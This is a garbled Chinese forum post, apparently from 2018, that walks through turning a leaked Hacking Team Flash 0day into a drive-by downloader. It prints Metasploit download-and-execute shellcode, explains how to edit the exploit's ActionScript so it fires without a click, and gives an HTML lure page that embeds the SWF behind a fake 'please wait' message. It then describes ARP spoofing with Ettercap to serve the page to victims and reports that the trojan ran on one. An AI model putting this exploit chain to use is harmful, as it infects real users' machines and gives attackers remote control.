|
4 N/ k" Z+ A f7 J* _8 j 三、flash 0day之手工代码修改制作下载者实例入侵演示
' c+ b3 g, X3 t
7 n" k3 x! l' t8 L
5 z' a6 j" _7 m8 y 利用到的工具: 5 Z% j8 o- M+ Q P4 g: c
- r$ s1 S) q& v" y( H" X
5 P0 j/ r4 t- ~- f* v7 n% t' Q! y Msf & l/ N8 y. X8 _& |1 g
. H1 ^! i/ u3 s* |2 l+ O
# O' \$ A' ^0 t# d7 g N4 U Ettercap 7 O& P7 |4 M, Q6 T8 |$ M/ q* A' E; R$ Y6 {
9 z* c! q( a3 d( |! A3 p
& Q2 i' \+ ]2 Q* x) m% U5 | v Adobe Flash CS6 : ^* z9 s. ]; S( |
0 U! ~+ P! O* d) u4 _" D, s7 c( l; Y" N* W$ l: N3 P
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 4 i1 v' c0 |" D, @. z/ b
) ]- K7 s4 ?$ p+ B
W. V5 _! @# A8 D
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
. ]$ s/ V: p9 d1 i. z' o
+ ~1 v9 O& ]; t! k
& {6 ?% X3 _8 O) o/ K 如图: . U5 l. M. x& d! B4 b& o$ O* }
/ v2 u5 c( }0 h( i
) Z) D6 l4 v4 O
" ^9 p5 D4 I3 o: B
/ m. n# O6 t, m& |" b3 k. E! `0 @4 \# _
0 x, {: h3 S: y
. N" ]7 `. b4 @5 x2 q! I% W% Z( n: b
( o. F8 v- h, B8 ~+ F 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
) Y: E# L4 D! U- N: a0 V- G& s8 r
* g, V8 ]7 j5 n* ?# f& C* p+ c n0 z9 m7 h5 l3 P
1 e* o: W+ I- L( k, z8 o 5 Z! e R5 m& V& i
8 {& W( D; O2 m# K- r  : a/ X7 Y+ g2 x
: @* l( z& Y$ m2 D3 h9 A7 G
) C! D' J% {+ X- j$ S+ e1 ` 然后执行generate -t dword生成shellcode,如下: * M" b. E4 x, Z5 q8 ?/ W
, D9 {& x* T0 e; z0 Y7 D2 Q
! l1 P$ M* X" y* a 
2 y, c" ?: W8 X 1 b: |! t X0 k+ u2 E! h0 J' P+ |+ l% K
9 }6 U7 l- t) t) K3 Y. ]1 E2 j
复制代码到文本下便于我们一会编辑flash exp,如下: 8 T7 s$ I& w' c& o7 o1 {2 ^; l
, s$ V& k6 S9 H: y) w6 ~" B- B4 I7 r$ s+ h. T) _; {
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ; J$ s' ~7 B9 Z2 V* j
2 A' u6 T/ e. d* h+ p- v/ u( S2 P
+ ]) m% F( n: A a4 T1 q 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
9 e4 ?. C- v. R+ a# E) P& h3 ^ 2 y7 o4 T, S' N& S8 S# N
+ U6 F; f3 O: g
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
7 F( o' A E9 N$ {2 s- Y % E$ a$ |5 C8 p3 k% Z
( x% y3 {1 m9 A! ? 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
& _6 i; d$ L* a$ U6 n/ Y
8 X4 ~3 `. F! }$ h* u
) Y$ d) O$ z& G$ V9 g 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
( N i- {! Q! H: m2 S6 S/ ~ % R1 u! d- g3 q
1 V' q/ G/ x" K8 n4 W; t
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
, x; D# |4 Q% o% u9 k [ # j6 n; g7 g) E" D0 H
a+ S! b7 e+ o 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
! V( L/ }# l+ S0 S$ ^5 R% l6 e' H' }, m
1 @7 W3 c! ?% O& b( ]5 E. V
- m8 S {3 y) k5 ]; |5 f, s8 V% h ` 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
! H, }2 t8 f9 _* f1 m0 P( s: d0 D
- x1 _# x( F. \' n7 X5 q& I, J& W- M3 K
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
9 q3 Y0 D3 o# V; w& X
0 j2 ^5 m+ ?$ ?" \. o
( L$ z8 M f% S. S9 O( g 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
. b# {; @7 C: ^! a
. |) G3 h0 Y5 D# W5 `+ H4 p/ F: x" O
* J1 B( [$ ^2 P7 B) y$ ` 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, $ V4 b0 y6 \& w ]
( @/ }' O" R6 {& Y
, o7 N g8 G; M7 e! I# r0 F
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
. d: C; J3 S' F
7 I2 N: }. l$ c$ v$ e& {; x/ F# I6 r& R( N* N2 o" S
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 1 M: R2 d$ B' v) }; d4 ?
( s# F, |3 q$ Y( g; D3 o6 j) s
; f1 G. W# R. G5 H3 h
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 . I, j+ `& p: k+ d5 s- Y
% i9 Y, T# b$ l3 `8 m
" U9 r3 E+ _6 v& @- \
& Z- t8 K7 G I8 {$ r- Y
+ |( F! _8 a! _+ c
% Q) s% T. b/ J+ ]- Z9 h9 x
) T9 ^' d3 |; U" A# n , O8 }! t. C4 z# a2 `2 Q
/ ^) z4 G. @ g e' H4 B
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
8 f6 n# T7 t/ c: y- W# u1 I 3 A5 ~5 {) E4 m5 ^* S* z
% _2 F8 v) x; r: H2 k' ], H
$ X2 k- u% v8 D" x7 L9 v7 p" f ) Y! [9 J7 r; A* L) |
w& n6 L/ }9 |+ T' k: H- s9 ^& a- Y. P" {
先修改ShellWin32.as,部分源代码如图: ]* U% @& r( ^
. P. R% x# R3 r. B% K1 q1 c' v1 z; {2 a8 o$ ^& x& D: i$ ^
 # O3 u4 ]3 k5 S6 r4 ^2 p
5 Y6 h+ E- K; j7 Z
& L5 t. d7 a+ b5 ], | 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
/ e) `! e6 p& s; m( q- ` q+ K
w2 E% _' O! Q. O, a) _/ @ Q1 H/ U
; E% @9 q2 E, E1 `
* ^7 @. m1 I/ ?2 L. k7 `; ~
8 V# D# ^ q/ d 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
3 ?5 Y+ Q. c4 M2 m 6 x$ ]7 B' B" r3 \6 `
. Y" o: R; f5 x+ S# c. }1 J5 E  ) e) ~& P6 O% w' O- w4 o5 p. v2 n( y
4 g6 K/ B5 r! h! X/ ~# e# y
( G! v" ]$ X% ?- Z1 ~/ s3 l 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
' @1 D& N1 N0 F( l$ |7 `+ N
" n% k6 n4 Y" c2 M' W& s$ v; f3 K, c. a+ G& `- [- ~
6 ]8 X+ C3 ?5 F& y
, g1 l! v! k2 v# G! t0 i( \. ?" |+ P% l
$ o* J; X, P3 l% z- A. _
2 J1 w# ]. Y, e) ^( ]) P. d: } w6 v/ `
 2 ]& j2 o6 A$ I! |. N
: }3 V9 {$ ` Y6 t9 R" {& `
5 X, h8 w5 ]: q7 g3 j 然后点保存,下面我们来编译一下,打开
2 K* d% a" c/ a0 k; K4 S + m( [2 }4 k" I1 P* @
! x7 H( A3 s* s0 i4 o( E' e; k5 u& c
exp1.fla然后点文件-发布,看看编译没错误
) K) B7 L7 C( N/ N+ g& R: ~% E2 j @5 w, H. R6 T
2 c. p% x( Q% V+ k, `7 ~
8 u' h( R4 U6 C
: i' D$ C' `7 r8 @9 |' h
1 y: \% N' j) F: ?, d c+ E
4 T" `% Y" g4 u( n. H9 b3 ~
, ]2 k6 n0 d, Q1 O! W7 G7 I" \0 b+ |9 y- M
7 Z6 n# Z. g3 e& D
( @1 s. v: d; q2 ~. n; m- V/ l- _7 C+ q6 ~
& u2 q6 y' i" q- `* E $ Q4 z: C2 ~+ J ~. q2 j$ o& V
1 `4 _( u. S0 ?2 N 然后我们把生成的
& b' ^; c) O: Q) O: P8 z # Y; P2 ~) P$ C! S4 L% F' K6 u
+ l7 E2 F J) C* x& p9 ^. V/ B exp1.swf丢到kailinux 的/var/www/html下: ; L6 l+ M$ q# E8 ]# g
4 |- g2 p$ n r: h% C( \. \( E9 m( T8 {6 P9 b1 O' i" S! j
然后把这段代码好好编辑一下
% l, T/ k1 {: Z) l" W1 d ! U) ?; e5 }" ]; s) w* ~2 F" C* W) g
: j; J s- R5 n& ]! G; O O% Q
, _& f; {" \* S: T
) k8 A8 J& M: } b# P! ?! s
8 H; M/ m: a/ g6 |; U) \' k ; t) j) U/ Y1 c* Z/ R
5 D# P" X% k) t. u
) E8 I' Q" e/ m9 |
+ J0 g6 d# a, J8 @# \9 ]9 ?3 y 7 G# I" r6 q* s5 e& q
4 Q) B, L! o+ _2 z0 I" U P( w
8 X% j% @8 c& B( t; w- H : ~9 g# n& [5 N& w( m
) i0 |4 Z# [2 ~3 o1 e
# j# z/ m2 | Q! n) ~$ p
5 U' y4 d G e1 P& L% g& o
* s N, I4 ?: D' X( R/ s
% Y) H' e( T! B# x ~ a 1 {8 j8 o- T% i p( T3 ], o: l
* H, y8 G. p) o <!DOCTYPE html> / E* Y/ y$ S7 ?8 T& R, e% [' \
- E7 A0 u) U& y6 {3 q' b1 d
" e' v. G- l2 H/ S2 b) Y <html>
4 e; T8 j# R [! u
, d; }9 c: `+ t% a# Y4 V2 A* [% _; q* f; U, i
<head>
) I }; ?7 B) r+ C$ W 0 M9 W5 @: h/ K ?* [8 I& y" \0 e
. M, ^1 `4 n3 o% H' ?$ [/ F2 A: Z$ [ <meta http-equiv="Content-Type" content="text/html;
" R* S" a% d, T( o- X& C
3 b' t5 C( _1 @/ v, `
+ f! n- ]* W+ e' R4 M& [3 @ charset=utf-8"/> ' Q" r* f A- P
7 J+ M" }; x/ V6 } \9 ?% i2 l. ?9 e9 W' B" g7 F- @1 ^" j
</head> . @1 T' y2 A/ r. P4 |: q2 n
5 L* I. `* O; ~1 ?* e; R
- [2 ~! \* i/ @9 p" A <body>
) u3 G# k2 n7 C7 G9 {% H
: Q! n! C" @! V. T V* i. U
# q6 c. L* y. E* V6 z- X <h2> Please wait, the requested page is loading...</h2>
( m7 v, w" U1 @+ D L1 ]1 E7 J ' B% V' W' \% o: g! j
# c* x4 O- D/ E" ^ <br>
: d2 F0 f( i9 ~
3 {6 `3 h* Z! K- d# B" W9 p5 T2 l) a s
<OBJECT
, F e" h- C7 O5 |7 b! Y4 y2 X ' w& K- R& K% h1 j0 y" X
9 v" y$ R, U* A
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
0 X5 j9 Z$ `3 Z1 \5 T . m+ s4 E; r3 e! Z3 |/ V: d/ {% _
- J% K6 J2 F' ]3 E
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> / \% d* \! V" X% g5 Q6 p I, [
) \& D% g- l' l: r) d, t% C
( ]9 p4 C1 p" {) h1 f* Y8 S </body> 9 S& X: |+ ?5 f$ O3 q0 ` }
j' _& ]4 m' z9 s2 V3 z% }
9 v$ _/ ^& h. w2 R6 o <script>
$ A. W, h* Y$ [ % @ Z; a" D" V& f/ H4 @4 A
' O0 w+ n4 k1 c. W) M3 [5 a+ Y setTimeout(function () {
' ?4 m H( h! t7 c* X% U$ ~; E # S% |4 I8 u2 x( }; R! a2 ?
' G G$ F$ L4 g) P
! H2 V2 k2 n: Y2 t y- _+ l$ ]+ n
" Y% u- L7 B) a2 v
+ \4 u6 E4 g1 E
window.location.reload();
5 g+ f7 F5 l9 A! q2 m / G, l6 N a/ ], O; q b' M
( `# ?- q/ j f* r! l0 R+ v4 C
}, 10000); & \( d# P$ m! T+ ^; E
; z. A' t& Y9 [0 O& D0 V
& K3 o' H; v. f p) f. M# B. t. B
) r& X) C3 s3 E' [- C
! W6 D# \: F0 Z4 v d% x7 h1 T0 Z6 X, ? @6 N- H& V( j1 K0 I# @/ V$ q
</script>
3 |" D5 \# t( |. |1 F+ |
7 I5 f# m) C' B$ q
+ s+ s: t/ F8 w: A </html>
' A$ n* g/ S! b# j3 l# \
0 |+ \5 [; E9 ^" D" z, Z' }& @8 H, x, s H
6 v5 ]: W U+ V: u, p1 h & @+ }+ e: ^( O( [) E% A" K
/ {% F" g1 ]8 m- F) l: d6 E+ \ 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
t0 j% x2 x4 J" o$ b+ t
& I8 ]2 c. ]# _% W$ }% s& _% ]/ r! U1 P
2 H. D5 o2 J4 c u" ?' ^: m0 w7 r1 P
5 i' `. j. ?( V4 S6 C/ F# \5 W' x& m% q( [
4 Z, J1 g5 S$ R/ P
! P, \; L3 \/ |5 s/ @8 d
" H; p% P2 j$ `- ?& I9 i
) Z- F: g! Y- {* _9 W, m7 W
4 g f6 {/ [% h6 w! G+ o8 P
2 n6 G& s% u$ Q! _
5 w: _# x* f1 o( F2 q5 E0 O $ f* V6 {* w) B/ x+ g/ W
4 |; I0 r4 y7 K
4 D1 T1 h8 u) E$ f 3 J, L& ]& X( {" I0 ~% z6 j
* m2 i6 [2 ]: @( m. |8 C- B
下面我们用ettercap欺骗如图: + a/ ^2 L5 `0 {( V- l
% E) q4 w% J+ W- l1 i
7 f6 n l/ Y& o7 {4 {
8 L. K* f2 @ f, ]% c% A
$ Y4 _' e9 {) F( V
. S7 D! Z, f# r" [2 u" n
; o2 m7 d& r% w1 N; t1 b
# P/ d) K* F4 _
. g2 n8 `( F% L. o/ B 下面我们随便访问个网站看看: $ V* X8 W, L* v. q. l. m
& d! u0 g! p- L3 m4 B5 c/ M. S& w( V
6 `2 p" H. _3 g! T/ o 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 4 n$ j1 O# U3 [ g" o
* `5 d! r$ @& B3 d- n) Z( ?0 T
2 `, ?) W5 s% G. r0 C 
1 ?' n& z N, R, Z( A7 l / ^4 q/ J0 p3 ]$ B6 N7 w
- |, W$ `/ ?! ?: w7 I0 P- e
我们看另一台,
9 w( W# |- i$ P$ M8 U w6 h & N/ w2 K! E. c: a+ t4 f$ I
' }. Q: z) C) _ `( h$ X& P 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 6 Q; T( ^8 `! e) w6 b
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对